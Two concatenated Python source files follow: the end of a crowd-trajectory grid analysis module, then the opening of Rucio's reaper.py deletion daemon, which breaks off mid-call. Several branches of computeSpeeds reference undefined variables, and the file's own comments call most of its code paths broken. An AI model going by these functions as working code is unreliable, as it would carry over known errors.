        pedData.setNext( 0 )
        # Each worker thread gets its own empty signal copy (no shared mutable state):
        argsFunc = lambda: ( signal.copyEmpty(), pedData, gridDomain, kernel )
        return self._threadWork( 'splat', threadConvolve, argsFunc, gridDomain, overwrite )
def computeSpeeds( self, gridDomain, pedData, timeStep, excludeStates=(), speedType=BLIT_SPEED, timeWindow=1, overwrite=True, maxSpeed=3.0 ):
    '''Computes a per-cell speed field for every frame of trajectory data and
    writes the sequence to <outFileName>.speed.
    @param gridDomain An instance of AbstractGrid, specifying the grid domain
    and resolution over which the speed field is calculated.
    @param pedData The pedestrian data to process (the product of a call to trajectory.loadTrajectory).
    @param timeStep The duration of a single frame of data in the pedData.
    @param excludeStates The state of agents to occlude. This only applies if the data has state information.
    @param speedType The exact visualization type (one of the GridFileSequence *_SPEED constants).
    @param timeWindow The number of frames over which speed is computed - default is one frame, instantaneous speed.
    @param overwrite A boolean. NOTE(review): currently unused in this method -- confirm intent.
    @param maxSpeed Because the data may include 'teleporting', instantaneous velocity
    can grow arbitrarily high. The computed speed is clamped to maxSpeed.
    @returns A 2-tuple (StatRecord instance, string) on success: a record of the
    per-frame speed statistics and the name of the output file. Returns None
    (bare return) when there are too few frames for the requested window.
    '''
    # NOTE: Python 2 module (print statements, `raise E, msg` syntax below).
    print "Computing speeds:"
    print "\tminCorner: ", gridDomain.minCorner
    print "\tsize: ", gridDomain.size
    print "\tresolution: ", gridDomain.resolution
    print "\ttime step: ", timeStep
    print "\ttime window:", timeWindow
    # file output
    fileName = self.outFileName + '.speed'
    outFile = open( fileName, 'wb' )
    # Header is written with placeholder count/range; patched by fillInHeader below.
    outFile.write( self.header( gridDomain.minCorner, gridDomain.size, gridDomain.resolution ) )
    maxVal = -1e6
    minVal = 1e6
    gridCount = 0
    gridSize = gridDomain.resolution[0] * gridDomain.resolution[1]
    cellSize = gridDomain.cellSize
    pedData.setNext( 0 )
    # Prime a sliding window of timeWindow+1 frames.
    data = []
    try:
        data = [ pedData.next()[0].copy() for i in range( timeWindow + 1 ) ]
    except StopIteration:
        print "Unable to compute speed! Insufficient frames of data for the given window!"
        return
    # continue while the index of the last frame on the queue is greater than the index of the first frame
    # TODO: THIS IS INCREDIBLY BROKEN!!!! MOST OF THESE CODE PATHS DON'T WORK!
    # NOTE(review): `maxRad` is referenced below (distFunc, Kernel(...)) but is
    # never assigned before use -- every branch except BLIT_SPEED raises
    # NameError. It is only set to None *after* the branches. Confirm the
    # missing parameter/assignment before relying on any non-BLIT path.
    distFunc = lambda x, y: np.exp( -( (x * x + y *y) / ( maxRad * maxRad ) ) )
    print "Speedy type:", speedType
    if ( speedType == GridFileSequence.BLIT_SPEED ):
        # Direct blit: no smoothing kernel; -1.0 marks untouched cells.
        speedFunc = RasterGrid.rasterizeSpeedBlit
        kernel = None
        gridFunc = lambda: RasterGrid( gridDomain.minCorner, gridDomain.size, gridDomain.resolution, -1.0 )
    elif ( speedType == GridFileSequence.NORM_SPEED ):
        speedFunc = RasterGrid.rasterizeSpeedGauss
        kernel = Kernel( maxRad, distFunc, cellSize )
        gridFunc = lambda: RasterGrid( gridDomain.minCorner, gridDomain.size, gridDomain.resolution )
    elif ( speedType == GridFileSequence.UNNORM_SPEED ):
        speedFunc = RasterGrid.rasterizeSpeedGauss
        kernel = Kernel( maxRad, distFunc, cellSize )
        gridFunc = lambda: RasterGrid( gridDomain.minCorner, gridDomain.size, gridDomain.resolution )
    elif ( speedType == GridFileSequence.NORM_DENSE_SPEED ):
##            try:
##                denseFile = open( self.outFileName + ".density", "rb" )
##            except:
##                print "Can't open density file: %.density" % ( self.outFileName )
##                raise
##            else:
##                w, h, count, minVal, maxVal = struct.unpack( 'iiiff', denseFile.read( self.headerSize ) )
##                assert( w == resolution[0] and h == resolution[1] )
##            speedFunc = lambda g, k, f2, f1, dist, rad, step: RasterGrid.rasterizeDenseSpeed( g, denseFile, k, f2, f1, dist, rad, step )
##            kernel = Kernel( maxRad, distFunc, cellSize )
##            gridFunc = lambda: RasterGrid( gridDomain.minCorner, gridDomain.size, gridDomain.resolution )
        raise ValueError, "This currently unsupported."
    elif ( speedType == GridFileSequence.NORM_CONTRIB_SPEED ):
        speedFunc = RasterGrid.rasterizeContribSpeed
        kernel = Kernel( maxRad, distFunc, cellSize )
        gridFunc = lambda: RasterGrid( gridDomain.minCorner, gridDomain.size, gridDomain.resolution )
    elif ( speedType == GridFileSequence.LAPLACE_SPEED ):
        distFunc = lambda x, y: 1.0 / ( np.pi * maxRad * maxRad ) * ((x * x + y * y - maxRad * maxRad) / (0.25 * maxRad ** 4 ) ) * np.exp( -( (x * x + y *y) / ( maxRad * maxRad ) ) )
        gridFunc = lambda: RasterGrid( gridDomain.minCorner, gridDomain.size, gridDomain.resolution )
        # NOTE(review): `resolution` is undefined here (presumably should be
        # gridDomain.resolution) -- this branch raises NameError as written.
        X = np.zeros( resolution, dtype=np.float32 )
        Y = np.zeros( resolution, dtype=np.float32 )
        speedFunc = lambda g, k, f2, f1, dist, rad, step: RasterGrid.rasterizeVelocity( g, X, Y, k, f2, f1, dist, rad, step )
        kernel = Kernel( maxRad, distFunc, cellSize )
    maxRad = None
    # TODO: This will probably break for some other speed vis method
    stats = StatRecord( pedData.agentCount() )
    while ( True ):
        # f1 = oldest frame in the window, f2 = newest; speed spans the window.
        f1 = data.pop(0)
        f2 = data[ -1 ]
        g = gridFunc()
        speedFunc( g, kernel, f2, f1, distFunc, maxRad, timeStep * timeWindow, excludeStates, stats, maxSpeed )
        M = g.maxVal()
        if ( M > maxVal ):
            maxVal = M
        m = g.minVal()
        if ( m < minVal ):
            minVal = m
        outFile.write( g.binaryString() )
        gridCount += 1
        try:
            data.append( pedData.next()[0].copy() )
        except StopIteration:
            break
        stats.nextFrame()
    if ( speedType != GridFileSequence.LAPLACE_SPEED ):
        minVal = 0
    # add the additional information about grid count and maximum values
    self.fillInHeader( outFile, gridCount, minVal, maxVal )
    outFile.close()
    return stats, fileName
def initProgress( self, frame ):
    '''Builds the per-agent progress bookkeeping array for the given frame.
    Returns an N x 3 float32 array where columns 0 & 1 hold each agent's
    normalized position direction and column 2 holds the best progress so
    far (initialized to zero).'''
    agentTotal = len( frame.agents )
    record = np.zeros( ( agentTotal, 3 ), dtype=np.float32 )
    for idx, agent in enumerate( frame.agents ):
        direction = agent.pos.normalize()
        record[ idx, 0 ] = direction.x
        record[ idx, 1 ] = direction.y
    return record
def computeProgress( self, minCorner, size, resolution, maxRad, frameSet, timeStep, excludeStates, timeWindow=1 ):
    """Computes the progress from one frame to the next - progress is measured in the fraction
    of the circle traversed from the initial position.

    Writes the grid sequence to <outFileName>.progress and returns a
    StatRecord with per-frame progress statistics.
    NOTE(review): maxRad, timeStep and timeWindow beyond the window size are
    only printed, not used in the computation below -- confirm intent.
    """
    print "Computing progress:"
    print "\tminCorner: ", minCorner
    print "\tsize: ", size
    print "\tresolution: ", resolution
    print "\tmaxRad: ", maxRad
    print "\ttime step: ", timeStep
    print "\ttime window:", timeWindow
    outFile = open( self.outFileName + '.progress', 'wb' )
    # Header written with placeholders; patched by fillInHeader below.
    outFile.write( self.header( minCorner, size, resolution ) )
    maxVal = -1e6
    minVal = 1e6
    gridCount = 0
    gridSize = resolution[0] * resolution[1]
    cellSize = Vector2( size.x / float( resolution[0] ), size.y / float( resolution[1] ) )
    frameSet.setNext( 0 )
    # Sliding window of timeWindow+1 (frame, index) pairs.
    data = [ frameSet.next() for i in range( timeWindow + 1 ) ]
    stats = StatRecord( frameSet.agentCount() )
    initFrame, initIndex = data[0]
    progress = self.initProgress( initFrame )
    while ( data[ -1 ][0] ):
        print '.',
        f1, i1 = data.pop(0)
        f2, i2 = data[ -1 ]
        # Cells default to the sentinel 100.0; it is swapped to -100.0 below
        # so untouched cells do not pollute the maximum.
        g = RasterGrid( minCorner, size, resolution, 100.0 )
        g.rasterizeProgress( f2, initFrame, progress, excludeStates, stats )
        m = g.minVal()
        if ( m < minVal ):
            minVal = m
        g.swapValues( 100.0, -100.0 )
        M = g.maxVal()
        if ( M > maxVal ):
            maxVal = M
        outFile.write( g.binaryString() )
        gridCount += 1
        data.append( frameSet.next() )
        stats.nextFrame()
    print
    # add the additional information about grid count and maximum values
    self.fillInHeader( outFile, gridCount, minVal, maxVal )
    outFile.close()
    return stats
def computeAngularSpeeds( self, minCorner, size, resolution, maxRad, frameSet, timeStep, excludeStates, speedType=BLIT_SPEED, timeWindow=1 ):
    """Computes a per-cell angular-speed (omega) field for each frame and writes
    the sequence to <outFileName>.omega.

    Only BLIT_SPEED is supported; every other speedType raises ValueError.
    @returns A StatRecord instance with per-frame statistics.
    """
    print "Computing angular speed:"
    print "\tminCorner: ", minCorner
    print "\tsize: ", size
    print "\tresolution: ", resolution
    print "\tmaxRad: ", maxRad
    print "\ttime step: ", timeStep
    print "\ttime window:", timeWindow
    outFile = open( self.outFileName + '.omega', 'wb' )
    # Header written with placeholders; patched by fillInHeader below.
    outFile.write( self.header( minCorner, size, resolution ) )
    maxVal = -1e6
    minVal = 1e6
    gridCount = 0
    gridSize = resolution[0] * resolution[1]
    cellSize = Vector2( size.x / float( resolution[0] ), size.y / float( resolution[1] ) )
    frameSet.setNext( 0 )
    # Sliding window of timeWindow+1 (frame, index) pairs.
    data = [ frameSet.next() for i in range( timeWindow + 1 ) ]
    # continue while the index of the last frame on the queue is greater than the index of the first frame
    distFunc = lambda x, y: np.exp( -( (x * x + y *y) / ( maxRad * maxRad ) ) )
    print "Speedy type:", speedType
    if ( speedType == GridFileSequence.BLIT_SPEED ):
        # 720.0 is the sentinel for untouched cells; swapped to -720.0 below.
        speedFunc = RasterGrid.rasterizeOmegaBlit
        kernel = None
        gridFunc = lambda: RasterGrid( minCorner, size, resolution, 720.0 )
    elif ( speedType == GridFileSequence.NORM_SPEED ):
        raise ValueError, "Compute Angular speed doesn't support normalized angular speed"
##            speedFunc = RasterGrid.rasterizeSpeedGauss
##            kernel = Kernel( maxRad, distFunc, cellSize )
##            gridFunc = lambda: RasterGrid( minCorner, size, resolution )
    elif ( speedType == GridFileSequence.UNNORM_SPEED ):
        raise ValueError, "Compute Angular speed doesn't support unnormalized angular speed"
##            speedFunc = RasterGrid.rasterizeSpeedGauss
##            kernel = Kernel( maxRad, distFunc, cellSize )
##            gridFunc = lambda: RasterGrid( minCorner, size, resolution )
    elif ( speedType == GridFileSequence.NORM_DENSE_SPEED ):
        raise ValueError, "Compute Angular speed doesn't support normalized density angular speed"
##            try:
##                denseFile = open( self.outFileName + ".density", "rb" )
##            except:
##                print "Can't open density file: %.density" % ( self.outFileName )
##                raise
##            else:
##                w, h, count, minVal, maxVal = struct.unpack( 'iiiff', denseFile.read( self.headerSize ) )
##                assert( w == resolution[0] and h == resolution[1] )
##            speedFunc = lambda g, k, f2, f1, dist, rad, step: RasterGrid.rasterizeDenseSpeed( g, denseFile, k, f2, f1, dist, rad, step )
##            kernel = Kernel( maxRad, distFunc, cellSize )
##            gridFunc = lambda: RasterGrid( minCorner, size, resolution )
    elif ( speedType == GridFileSequence.NORM_CONTRIB_SPEED ):
        raise ValueError, "Compute Angular speed doesn't support normalized contribution angular speed"
##            speedFunc = RasterGrid.rasterizeContribSpeed
##            kernel = Kernel( maxRad, distFunc, cellSize )
##            gridFunc = lambda: RasterGrid( minCorner, size, resolution )
    elif ( speedType == GridFileSequence.LAPLACE_SPEED ):
        raise ValueError, "Compute Angular speed doesn't support laplacian angular speed"
##            distFunc = lambda x, y: 1.0 / ( np.pi * maxRad * maxRad ) * ((x * x + y * y - maxRad * maxRad) / (0.25 * maxRad ** 4 ) ) * np.exp( -( (x * x + y *y) / ( maxRad * maxRad ) ) )
##            gridFunc = lambda: RasterGrid( minCorner, size, resolution )
##            X = np.zeros( resolution, dtype=np.float32 )
##            Y = np.zeros( resolution, dtype=np.float32 )
##            speedFunc = lambda g, k, f2, f1, dist, rad, step: RasterGrid.rasterizeVelocity( g, X, Y, k, f2, f1, dist, rad, step )
##            kernel = Kernel( maxRad, distFunc, cellSize )
    stats = StatRecord( frameSet.agentCount() )
    while ( data[ -1 ][0] ):
        f1, i1 = data.pop(0)
        f2, i2 = data[ -1 ]
        g = gridFunc()
        speedFunc( g, kernel, f2, f1, distFunc, maxRad, timeStep * timeWindow, excludeStates, stats )
        m = g.minVal()
        if ( m < minVal ):
            minVal = m
        # swap out 720.0 value for -720
        g.swapValues( 720.0, -720.0 )
        M = g.maxVal()
        if ( M > maxVal ):
            maxVal = M
        outFile.write( g.binaryString() )
        gridCount += 1
        data.append( frameSet.next() )
        stats.nextFrame()
##        if ( speedType != GridFileSequence.LAPLACE_SPEED ):
##            minVal = 0
    # add the additional information about grid count and maximum values
    self.fillInHeader( outFile, gridCount, minVal, maxVal )
    outFile.close()
    return stats
def readGrid( self, g, file, gridSize, index ):
    """Loads the index-th grid from the given open file into g.

    @param g The grid object to populate; receives raw bytes via setFromBinary.
    @param file An open binary file containing the grid sequence.
    @param gridSize The size, in bytes, of one serialized grid.
    @param index The zero-based index of the grid to read.
    """
    # BUG FIX: the original recomputed gridSize from an undefined name
    # `resolution` (raising NameError and clobbering the parameter); the
    # caller-supplied gridSize is used directly instead.
    file.seek( self.headerSize + index * gridSize )
    data = file.read( gridSize )
    g.setFromBinary( data )
def computeAdvecFlow( self, minCorner, size, resolution, distFunc, maxDist, kernelSize, frameSet, lines ):
    """Performs a visualization of marking agents according to their initial position w.r.t. a line.

    On the first frame each agent is tagged with max( maxDist - d, 0 ), where d
    is its distance to the nearest line; every frame then rasterizes that fixed
    per-agent value to <outFileName>.advec.
    """
    # initialization
    # Iterate through the agents on the first frame
    frameSet.setNext( 0 )
    f, i = frameSet.next()
    for agt in f.agents:
        pos = agt.pos
        minDist = 1e6
        for line in lines:
            dist = line.pointDistance( pos )
            if ( dist < minDist ):
                minDist = dist
        agt.value = max( maxDist - minDist, 0 )
    # now iterate through each frame and rasterize it
    outFile = open( self.outFileName + '.advec', 'wb' )
    outFile.write( struct.pack( 'ii', resolution[0], resolution[1] ) ) # size of grid
    outFile.write( struct.pack( 'i', 0 ) ) # grid count placeholder, patched by fillInHeader
    outFile.write( struct.pack( 'ff', 0.0, 0.0 ) ) # range of grid values (placeholder)
    maxVal = 0
    gridCount = 0
    gridSize = resolution[0] * resolution[1]  # NOTE(review): unused below -- confirm
    while ( True ):
        g = RasterGrid( minCorner, size, resolution )
        g.rasterizeValue( f, distFunc, kernelSize )
        M = g.maxVal()
        if ( M > maxVal ):
            maxVal = M
        outFile.write( g.binaryString() )
        gridCount += 1
        try:
            f, i = frameSet.next( True )
        except StopIteration:
            break
    # add the additional information about grid count and maximum values
    self.fillInHeader( outFile, gridCount, 0.0, maxVal )
    outFile.close()
def computeRegionSpeed( self, frameSet, polygons, timeStep, excludeStates, timeWindow=1 ):
    '''Given an ordered set of polygons, computes the average speed for all agents in each polygon
    per time step.

    Writes <outFileName>.region as a (frames x polygons) text matrix.
    @returns None.
    '''
    # NOTE: This only really applies to the tawaf.
    print "Computing regional speed:"
    print "\ttime step: ", timeStep
    print "Number of polygons:", len(polygons)
    frameSet.setNext( 0 )
    # Sliding window of timeWindow+1 (frame, index) pairs; speed spans the window.
    data = [ frameSet.next() for i in range( timeWindow + 1 ) ]
    # `regions` is threaded back into findRegionSpeed so region assignment
    # persists across frames.
    regions = None
    speeds = []
    while ( data[ -1 ][0] ):
        f1, i1 = data.pop(0)
        f2, i2 = data[ -1 ]
        frameSpeeds, regions = findRegionSpeed( f1, f2, timeStep * timeWindow, polygons, excludeStates, regions )
        speeds.append( frameSpeeds )
        data.append( frameSet.next() )
    data = np.array( speeds )
    np.savetxt( self.outFileName + ".region", data, fmt='%.5f' )
if __name__ == '__main__':
    def test():
        '''Ad-hoc smoke test: loads a hard-coded trajectory file and runs the
        Voronoi density computation over a fixed corridor domain.'''
        from trajectory import loadTrajectory
        import os  # NOTE(review): unused -- confirm removable
##        obstPath = r'/projects/crowd/fund_diag/paper/pre_density/experiment/Inputs/Corridor_oneway/c240_obstacles.xml'
##        path = r'/projects/crowd/fund_diag/paper/pre_density/experiment/results/density/gaussian_S1.5/uo-065-240-240_combined_MB.density'
##        outPath = r'/projects/crowd/fund_diag/paper/pre_density/experiment/results/density/gaussian_S1.5/uo-065-240-240_combined_MB_density/'
        pedFile = r'/projects/crowd/fund_diag/paper/pre_density/experiment/Inputs/Corridor_onewayDB/uo-065-240-240_combined_MB.txt'
        try:
            frameSet = loadTrajectory( pedFile )
        except ValueError:
            # NOTE(review): execution continues with frameSet unbound after
            # this message, so the computeVoronoiDensity call below would
            # raise NameError -- confirm whether an early return is intended.
            print "Unable to recognize the data in the file: %s" % ( pedFile )
        domain = AbstractGrid( Vector2( 0.0, -6 ), Vector2( 2.4, 12 ), ( 10, 100 ) )
        gfs = GridFileSequence( 'sequence', arrayType=np.float32 )
        gfs.computeVoronoiDensity( domain, frameSet, None )
##        gfs = GridFileSequence( 'sequence', arrayType=np.int32 )
##        gfs.computeVoronoi( domain, frameSet, None )
    test()
|
reaper.py | # Copyright 2016-2018 CERN for the benefit of the ATLAS collaboration.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Authors:
# - Vincent Garonne <vgaronne@gmail.com>, 2016-2018
# - Martin Barisits <martin.barisits@cern.ch>, 2016
# - Thomas Beermann <thomas.beermann@cern.ch>, 2016-2019
# - Wen Guan <wguan.icedew@gmail.com>, 2016
# - Hannes Hansen <hannes.jakob.hansen@cern.ch>, 2018-2019
# - Dimitrios Christidis <dimitrios.christidis@cern.ch>, 2019
# - Andrew Lister <andrew.lister@stfc.ac.uk>, 2019
#
# PY3K COMPATIBLE
'''
Reaper is a daemon to manage file deletion.
'''
from __future__ import print_function, division
import datetime
import hashlib
import logging
import math
import os
import random
import socket
import sys
import threading
import time
import traceback
from rucio.db.sqla.constants import ReplicaState
from rucio.common.config import config_get
from rucio.common.exception import (SourceNotFound, ServiceUnavailable, RSEAccessDenied,
ReplicaUnAvailable, ResourceTemporaryUnavailable,
DatabaseException, UnsupportedOperation,
ReplicaNotFound, RSENotFound)
from rucio.common.utils import chunks
from rucio.core import monitor
from rucio.core import rse as rse_core
from rucio.core.credential import get_signed_url
from rucio.core.heartbeat import live, die, sanity_check
from rucio.core.message import add_message
from rucio.core.replica import (list_unlocked_replicas, update_replicas_states,
delete_replicas)
from rucio.core.rse import get_rse_attribute, sort_rses, get_rse_name
from rucio.core.rse_expression_parser import parse_expression
from rucio.rse import rsemanager as rsemgr
# Silence the noisy `requests` dependency; only CRITICAL records pass through.
logging.getLogger("requests").setLevel(logging.CRITICAL)

# Root logger: level comes from the [common]/loglevel config option (default
# DEBUG); one tab-separated line per record on stdout.
logging.basicConfig(stream=sys.stdout,
                    level=getattr(logging,
                                  config_get('common', 'loglevel',
                                             raise_exception=False,
                                             default='DEBUG').upper()),
                    format='%(asctime)s\t%(process)d\t%(levelname)s\t%(message)s')

# Set by stop() to request a graceful shutdown of all reaper loops.
GRACEFUL_STOP = threading.Event()
def __check_rse_usage(rse_id):
    """
    Internal method to check RSE usage and limits.

    :param rse_id: the rse id.

    :returns : max_being_deleted_files, needed_free_space, used, free.
        Any element may be None when the corresponding limit/usage source
        is not configured or unavailable.
    """
    max_being_deleted_files, needed_free_space, used, free = None, None, None, None
    # `rse` is only consumed by the locals()-based logging.debug below.
    rse = get_rse_name(rse_id=rse_id)

    # Get RSE limits
    limits = rse_core.get_rse_limits(rse_id=rse_id)
    # NOTE(review): with `and`, this only returns early when `limits` is
    # empty/falsy (the two `not in` tests are then trivially true). If the
    # intent was "bail when the relevant keys are missing", `or` semantics
    # would be needed -- confirm before changing.
    if not limits and 'MinFreeSpace' not in limits and 'MaxBeingDeletedFiles' not in limits:
        return max_being_deleted_files, needed_free_space, used, free

    min_free_space = limits.get('MinFreeSpace')
    max_being_deleted_files = limits.get('MaxBeingDeletedFiles')

    # Check from which sources to get used and total spaces
    # Default is storage
    source_for_total_space, source_for_used_space = 'storage', 'storage'
    values = get_rse_attribute(rse_id=rse_id, key='source_for_total_space')
    if values:
        source_for_total_space = values[0]
    values = get_rse_attribute(rse_id=rse_id, key='source_for_used_space')
    if values:
        source_for_used_space = values[0]

    logging.debug('RSE: %(rse)s, source_for_total_space: %(source_for_total_space)s, '
                  'source_for_used_space: %(source_for_used_space)s' % locals())

    # Get total and used space
    usage = rse_core.get_rse_usage(rse_id=rse_id, source=source_for_total_space)
    if not usage:
        return max_being_deleted_files, needed_free_space, used, free
    # Only the first usage record is consulted.
    for var in usage:
        total, used = var['total'], var['used']
        break

    # Used space may come from a different source than the total.
    if source_for_total_space != source_for_used_space:
        usage = rse_core.get_rse_usage(rse_id=rse_id, source=source_for_used_space)
        if not usage:
            return max_being_deleted_files, needed_free_space, None, free
        for var in usage:
            used = var['used']
            break

    free = total - used
    if min_free_space:
        # Positive => this many bytes must still be freed to reach the limit.
        needed_free_space = min_free_space - free

    return max_being_deleted_files, needed_free_space, used, free
def reaper(rses, worker_number=1, child_number=1, total_children=1, chunk_size=100,
           once=False, greedy=False, scheme=None, delay_seconds=0):
    """
    Main loop to select and delete files.

    :param rses: List of RSEs the reaper should work against. If empty, it considers all RSEs.
    :param worker_number: The worker number.
    :param child_number: The child number.
    :param total_children: The total number of children created per worker.
    :param chunk_size: the size of chunk for deletion.
    :param once: If True, only runs one iteration of the main loop.
    :param greedy: If True, delete right away replicas with tombstone.
    :param scheme: Force the reaper to use a particular protocol, e.g., mock.
    :param delay_seconds: Passed through to list_unlocked_replicas.
    """
    logging.info('Starting Reaper: Worker %(worker_number)s, '
                 'child %(child_number)s will work on RSEs: ' % locals() + ', '.join([rse['rse'] for rse in rses]))

    pid = os.getpid()
    thread = threading.current_thread()
    hostname = socket.gethostname()
    executable = ' '.join(sys.argv)
    # Generate a hash just for the subset of RSEs
    rse_names = [rse['rse'] for rse in rses]
    # NOTE(review): sha256 of a str is Python-2 only; Python 3 requires bytes.
    hash_executable = hashlib.sha256(sys.argv[0] + ''.join(rse_names)).hexdigest()
    sanity_check(executable=None, hostname=hostname)

    # Per-RSE back-off: timestamps before which an RSE should be skipped.
    nothing_to_do = {}

    while not GRACEFUL_STOP.is_set():
        try:
            # heartbeat
            heartbeat = live(executable=executable, hostname=hostname, pid=pid, thread=thread, hash_executable=hash_executable)
            checkpoint_time = datetime.datetime.now()
            # logging.info('Reaper({0[worker_number]}/{0[child_number]}): Live gives {0[heartbeat]}'.format(locals()))

            max_deleting_rate = 0  # NOTE(review): never updated or read -- confirm removable
            for rse in sort_rses(rses):
                try:
                    # Renew the heartbeat at most once a minute.
                    if checkpoint_time + datetime.timedelta(minutes=1) < datetime.datetime.now():
                        heartbeat = live(executable=executable, hostname=hostname, pid=pid, thread=thread, hash_executable=hash_executable)
                        # logging.info('Reaper({0[worker_number]}/{0[child_number]}): Live gives {0[heartbeat]}'.format(locals()))
                        checkpoint_time = datetime.datetime.now()

                    # Skip RSEs that recently had nothing to delete (30-minute back-off).
                    if rse['id'] in nothing_to_do and nothing_to_do[rse['id']] > datetime.datetime.now():
                        continue
                    logging.info('Reaper %s-%s: Running on RSE %s %s', worker_number, child_number,
                                 rse['rse'], nothing_to_do.get(rse['id']))

                    rse_info = rsemgr.get_rse_info(rse['rse'])
                    rse_protocol = rse_core.get_rse_protocols(rse_id=rse['id'])

                    if not rse_protocol['availability_delete']:
                        logging.info('Reaper %s-%s: RSE %s is not available for deletion', worker_number, child_number, rse_info['rse'])
                        nothing_to_do[rse['id']] = datetime.datetime.now() + datetime.timedelta(minutes=30)
                        continue

                    # Temporary hack to force gfal for deletion
                    for protocol in rse_info['protocols']:
                        if protocol['impl'] == 'rucio.rse.protocols.srm.Default' or protocol['impl'] == 'rucio.rse.protocols.gsiftp.Default':
                            protocol['impl'] = 'rucio.rse.protocols.gfal.Default'

                    needed_free_space, max_being_deleted_files = None, 100
                    needed_free_space_per_child = None
                    if not greedy:
                        max_being_deleted_files, needed_free_space, used, free = __check_rse_usage(rse_id=rse['id'])
                        logging.info('Reaper %(worker_number)s-%(child_number)s: Space usage for RSE %(rse)s - max_being_deleted_files: %(max_being_deleted_files)s, needed_free_space: %(needed_free_space)s, used: %(used)s, free: %(free)s' % locals())
                        # NOTE(review): needed_free_space can be None here; the
                        # comparison below only works under Python 2 ordering.
                        if needed_free_space <= 0:
                            needed_free_space, needed_free_space_per_child = 0, 0
                            logging.info('Reaper %s-%s: free space is above minimum limit for %s', worker_number, child_number, rse['rse'])
                        else:
                            # Split the space to reclaim evenly across the children.
                            if total_children and total_children > 0:
                                needed_free_space_per_child = needed_free_space / float(total_children)

                    start = time.time()
                    with monitor.record_timer_block('reaper.list_unlocked_replicas'):
                        replicas = list_unlocked_replicas(rse_id=rse['id'],
                                                          bytes=needed_free_space_per_child,
                                                          limit=max_being_deleted_files,
                                                          worker_number=child_number,
                                                          total_workers=total_children,
                                                          delay_seconds=delay_seconds)
                    logging.debug('Reaper %s-%s: list_unlocked_replicas on %s for %s bytes in %s seconds: %s replicas', worker_number, child_number, rse['rse'], needed_free_space_per_child, time.time() - start, len(replicas))

                    if not replicas:
                        nothing_to_do[rse['id']] = datetime.datetime.now() + datetime.timedelta(minutes=30)
                        logging.info('Reaper %s-%s: No replicas to delete %s. The next check will occur at %s',
                                     worker_number, child_number, rse['rse'],
                                     nothing_to_do[rse['id']])
                        continue

                    prot = rsemgr.create_protocol(rse_info, 'delete', scheme=scheme)
                    for files in chunks(replicas, chunk_size):
                        logging.debug('Reaper %s-%s: Running on : %s', worker_number, child_number, str(files))
                        try:
                            # Mark the whole chunk BEING_DELETED before touching storage.
                            # NOTE(review): dict(items() + [...]) is Python-2 only.
                            update_replicas_states(replicas=[dict(replica.items() + [('state', ReplicaState.BEING_DELETED), ('rse_id', rse['id'])]) for replica in files], nowait=True)
                            # Resolve each replica's physical file name; failures
                            # leave pfn=None and are handled per-file below.
                            for replica in files:
                                try:
                                    # NOTE(review): .values()[0] is Python-2 only.
                                    replica['pfn'] = str(rsemgr.lfns2pfns(rse_settings=rse_info,
                                                                          lfns=[{'scope': replica['scope'].external, 'name': replica['name'], 'path': replica['path']}],
                                                                          operation='delete', scheme=scheme).values()[0])
                                except (ReplicaUnAvailable, ReplicaNotFound) as error:
                                    err_msg = 'Failed to get pfn UNAVAILABLE replica %s:%s on %s with error %s' % (replica['scope'], replica['name'], rse['rse'], str(error))
                                    logging.warning('Reaper %s-%s: %s', worker_number, child_number, err_msg)
                                    replica['pfn'] = None
                            monitor.record_counter(counters='reaper.deletion.being_deleted', delta=len(files))

                            try:
                                deleted_files = []
                                prot.connect()
                                for replica in files:
                                    try:
                                        logging.info('Reaper %s-%s: Deletion ATTEMPT of %s:%s as %s on %s', worker_number, child_number, replica['scope'], replica['name'], replica['pfn'], rse['rse'])
                                        start = time.time()
                                        # Staging RSEs get catalog-only deletion.
                                        if rse['staging_area'] or rse['rse'].endswith("STAGING"):
                                            logging.warning('Reaper %s-%s: Deletion STAGING of %s:%s as %s on %s, will only delete the catalog and not do physical deletion',
                                                            worker_number, child_number, replica['scope'], replica['name'], replica['pfn'], rse['rse'])
                                        else:
                                            if replica['pfn']:
                                                pfn = replica['pfn']
                                                # sign the URL if necessary
                                                if prot.attributes['scheme'] == 'https' and rse_info['sign_url'] is not None:
                                                    pfn = get_signed_url(rse_info['sign_url'], 'delete', pfn)
                                                prot.delete(pfn)
                                            else:
                                                logging.warning('Reaper %s-%s: Deletion UNAVAILABLE of %s:%s as %s on %s', worker_number, child_number, replica['scope'], replica['name'], replica['pfn'], rse['rse'])
                                        monitor.record_timer('daemons.reaper.delete.%s.%s' % (prot.attributes['scheme'], rse['rse']), (time.time() - start) * 1000)
                                        duration = time.time() - start

                                        deleted_files.append({'scope': replica['scope'], 'name': replica['name']})

                                        add_message('deletion-done', {'scope': replica['scope'].external,
                                                                      'name': replica['name'],
                                                                      'rse': rse_info['rse'],
                                                                      'rse_id': rse_info['id'],
                                                                      'file-size': replica['bytes'],
                                                                      'bytes': replica['bytes'],
                                                                      'url': replica['pfn'],
                                                                      'duration': duration,
                                                                      'protocol': prot.attributes['scheme']})
                                        logging.info('Reaper %s-%s: Deletion SUCCESS of %s:%s as %s on %s in %s seconds', worker_number, child_number, replica['scope'], replica['name'], replica['pfn'], rse['rse'], duration)
                                    except SourceNotFound:
                                        err_msg = 'Reaper %s-%s: Deletion NOTFOUND of %s:%s as %s on %s' % (worker_number, child_number, replica['scope'], replica['name'], replica['pfn'], rse['rse'])
                                        logging.warning(err_msg)
                                        # Already gone on storage: still remove from the catalog.
                                        deleted_files.append({'scope': replica['scope'], 'name': replica['name']})
                                        if replica['state'] == ReplicaState.AVAILABLE:
                                            add_message('deletion-failed', {'scope': replica['scope'].external,
                                                                            'name': replica['name'],
                                                                            'rse': rse_info['rse'],
                                                                            'rse_id': rse_info['id'],
                                                                            'file-size': replica['bytes'],
                                                                            'bytes': replica['bytes'],
                                                                            'url': replica['pfn'],
                                                                            'reason': str(err_msg),
                                                                            'protocol': prot.attributes['scheme']})
                                    except (ServiceUnavailable, RSEAccessDenied, ResourceTemporaryUnavailable) as error:
                                        logging.warning('Reaper %s-%s: Deletion NOACCESS of %s:%s as %s on %s: %s', worker_number, child_number, replica['scope'], replica['name'], replica['pfn'], rse['rse'], str(error))
                                        add_message('deletion-failed', {'scope': replica['scope'].external,
                                                                        'name': replica['name'],
